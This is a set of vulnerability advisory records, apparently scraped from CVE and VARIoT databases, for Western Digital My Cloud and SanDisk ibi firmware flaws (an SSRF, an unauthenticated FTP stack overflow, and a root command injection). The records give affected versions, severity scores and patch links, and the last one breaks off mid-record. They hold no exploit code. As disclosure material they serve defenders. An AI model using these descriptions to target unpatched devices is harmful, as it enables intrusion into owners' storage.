| Western Digital | My Cloud OS 5 |
Affected:
0 , < 5.27.161
(custom)
|
|
| Western Digital | My Cloud Home & Duo |
Affected:
0 , < 9.5.1-104
(custom)
|
|
| SanDisk | ibi |
Affected:
0 , < 9.5.1-104
(custom)
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-22817",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-06T15:36:16.188338Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:32.355Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T10:20:31.069Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.westerndigital.com/support/product-security/wdc-24001-western-digital-my-cloud-os-5-my-cloud-home-duo-and-sandisk-ibi-firmware-update"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"platforms": [
"Linux"
],
"product": "My Cloud OS 5",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "5.27.161",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"platforms": [
"Linux"
],
"product": "My Cloud Home \u0026 Duo",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "9.5.1-104",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"platforms": [
"Linux"
],
"product": "ibi",
"vendor": "SanDisk",
"versions": [
{
"lessThan": "9.5.1-104",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Sam Thomas (@_s_n_t) of Pentest Ltd (@pentestltd) working with Trend Micro\u2019s Zero Day Initiative"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Server-side request forgery (SSRF) vulnerability that could allow a rogue server on the local network to modify its URL using another DNS address to point back to the loopback adapter. This could then allow the URL to exploit other vulnerabilities on the local server. This was addressed\u0026nbsp;\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eby fixing DNS addresses that refer to loopback. \u003c/span\u003eThis issue affects My Cloud OS 5 devices before 5.27.161, My Cloud Home, My Cloud Home Duo and SanDisk ibi devices before 9.5.1-104.\u0026nbsp;\u003cbr\u003e"
}
],
"value": "Server-side request forgery (SSRF) vulnerability that could allow a rogue server on the local network to modify its URL using another DNS address to point back to the loopback adapter. This could then allow the URL to exploit other vulnerabilities on the local server. This was addressed\u00a0by fixing DNS addresses that refer to loopback. This issue affects My Cloud OS 5 devices before 5.27.161, My Cloud Home, My Cloud Home Duo and SanDisk ibi devices before 9.5.1-104.\u00a0\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-02-05T21:26:42.020Z",
"orgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"shortName": "WDC PSIRT"
},
"references": [
{
"url": "https://www.westerndigital.com/support/product-security/wdc-24001-western-digital-my-cloud-os-5-my-cloud-home-duo-and-sandisk-ibi-firmware-update"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003e\u003cdiv\u003e\u003cp\u003e\u003cspan style=\"background-color: var(--wht);\"\u003eFor My Cloud OS 5 devices,\u0026nbsp;\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eWestern Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification.\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"background-color: var(--wht);\"\u003eMy Cloud Home, My Cloud Home Duo and SanDisk ibi devices will be automatically updated to reflect the latest firmware version.\u003c/span\u003e\u003cbr\u003e\u003c/p\u003e\u003c/div\u003e\u003cdiv\u003e\u003c/div\u003e\u003c/div\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e\u003cbr\u003e"
}
],
"value": "For My Cloud OS 5 devices,\u00a0Western Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification.\n\nMy Cloud Home, My Cloud Home Duo and SanDisk ibi devices will be automatically updated to reflect the latest firmware version.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Server-side Request Forgery vulnerability in Western Digital My Cloud, My Cloud Home and SanDisk ibi products",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"assignerShortName": "WDC PSIRT",
"cveId": "CVE-2023-22817",
"datePublished": "2024-02-05T21:26:42.020Z",
"dateReserved": "2023-01-06T20:23:44.301Z",
"dateUpdated": "2024-08-02T10:20:31.069Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
VAR-202201-0609
Vulnerability from variot - Updated: 2024-02-13 22:43My Cloud OS 5 was vulnerable to a pre-authenticated stack overflow vulnerability on the FTP service that could be exploited by unauthenticated attackers on the network. Addressed the vulnerability by adding defenses against stack overflow issues. My Cloud OS 5 Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Western Digital My Cloud is a personal cloud storage device from Western Digital
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202201-0609",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "my cloud os",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "5.19.117"
},
{
"model": "my cloud os 5",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud os 5",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud os 5",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "my cloud os 5 firmware"
},
{
"model": "digital my cloud os",
"scope": "eq",
"trust": 0.6,
"vendor": "western",
"version": "5"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-06492"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003516"
},
{
"db": "NVD",
"id": "CVE-2022-22989"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_os:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.19.117",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_dl2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_dl4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex2_ultra:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_mirror_gen_2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_pr2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_pr4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:wd_cloud:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-22989"
}
]
},
"cve": "CVE-2022-22989",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2022-22989",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2022-06492",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2022-22989",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2022-22989",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "psirt@wdc.com",
"id": "CVE-2022-22989",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2022-06492",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202201-1067",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2022-22989",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-06492"
},
{
"db": "VULMON",
"id": "CVE-2022-22989"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003516"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1067"
},
{
"db": "NVD",
"id": "CVE-2022-22989"
},
{
"db": "NVD",
"id": "CVE-2022-22989"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "My Cloud OS 5 was vulnerable to a pre-authenticated stack overflow vulnerability on the FTP service that could be exploited by unauthenticated attackers on the network. Addressed the vulnerability by adding defenses against stack overflow issues. My Cloud OS 5 Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Western Digital My Cloud is a personal cloud storage device from Western Digital",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-22989"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003516"
},
{
"db": "CNVD",
"id": "CNVD-2022-06492"
},
{
"db": "VULMON",
"id": "CVE-2022-22989"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-22989",
"trust": 3.9
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003516",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2022-06492",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022021810",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1067",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-22989",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-06492"
},
{
"db": "VULMON",
"id": "CVE-2022-22989"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003516"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1067"
},
{
"db": "NVD",
"id": "CVE-2022-22989"
}
]
},
"id": "VAR-202201-0609",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-06492"
}
],
"trust": 1.45714287
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-06492"
}
]
},
"last_update_date": "2024-02-13T22:43:24.155000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "WDC-22002",
"trust": 0.8,
"url": "https://www.westerndigital.com/support/product-security/wdc-22002-my-cloud-os5-firmware-5-19-117"
},
{
"title": "Patch for Western Digital My Cloud OS 5 Buffer Overflow Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/315891"
},
{
"title": "Western Digital My Cloud Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=178222"
},
{
"title": "CVE-2022-XXXX",
"trust": 0.1,
"url": "https://github.com/alphabugx/cve-2022-23305 "
},
{
"title": "CVE-2022-XXXX",
"trust": 0.1,
"url": "https://github.com/alphabugx/cve-2022-rce "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-06492"
},
{
"db": "VULMON",
"id": "CVE-2022-22989"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003516"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1067"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-003516"
},
{
"db": "NVD",
"id": "CVE-2022-22989"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://www.westerndigital.com/support/product-security/wdc-22002-my-cloud-os5-firmware-5-19-117"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22989"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022021810"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/787.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/alphabugx/cve-2022-23305"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-06492"
},
{
"db": "VULMON",
"id": "CVE-2022-22989"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003516"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1067"
},
{
"db": "NVD",
"id": "CVE-2022-22989"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2022-06492"
},
{
"db": "VULMON",
"id": "CVE-2022-22989"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003516"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1067"
},
{
"db": "NVD",
"id": "CVE-2022-22989"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-06492"
},
{
"date": "2022-01-13T00:00:00",
"db": "VULMON",
"id": "CVE-2022-22989"
},
{
"date": "2023-02-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-003516"
},
{
"date": "2022-01-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202201-1067"
},
{
"date": "2022-01-13T21:15:08.863000",
"db": "NVD",
"id": "CVE-2022-22989"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-06492"
},
{
"date": "2023-10-12T00:00:00",
"db": "VULMON",
"id": "CVE-2022-22989"
},
{
"date": "2023-02-22T06:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-003516"
},
{
"date": "2022-02-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202201-1067"
},
{
"date": "2023-10-12T21:15:11.200000",
"db": "NVD",
"id": "CVE-2022-22989"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202201-1067"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "My\u00a0Cloud\u00a0OS\u00a05\u00a0 Out-of-bounds write vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-003516"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202201-1067"
}
],
"trust": 0.6
}
}
VAR-202201-0613
Vulnerability from variot - Updated: 2024-02-13 22:43A malicious user on the same LAN could use DNS spoofing followed by a command injection attack to trick a NAS device into loading through an unsecured HTTP call. Addressed this vulnerability by disabling checks for internet connectivity using HTTP. My Cloud OS 5 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Western Digital MyCloud PR4100. Authentication is not required to exploit this vulnerability.The specific flaw exists within the ConnectivityService service. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Western Digital My Cloud is a personal cloud storage device from Western Digital
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202201-0613",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "my cloud os",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "5.19.117"
},
{
"model": "my cloud os 5",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud os 5",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud os 5",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "my cloud os 5 firmware"
},
{
"model": "mycloud pr4100",
"scope": null,
"trust": 0.7,
"vendor": "western digital",
"version": null
},
{
"model": "digital my cloud os",
"scope": "eq",
"trust": 0.6,
"vendor": "western",
"version": "5"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-077"
},
{
"db": "CNVD",
"id": "CNVD-2022-06494"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003514"
},
{
"db": "NVD",
"id": "CVE-2022-22991"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_os:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.19.117",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_dl2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_dl4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex2_ultra:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_mirror_gen_2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_pr2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_pr4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:wd_cloud:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-22991"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Martin Rakhmanov (@mrakhmanov)",
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-077"
}
],
"trust": 0.7
},
"cve": "CVE-2022-22991",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
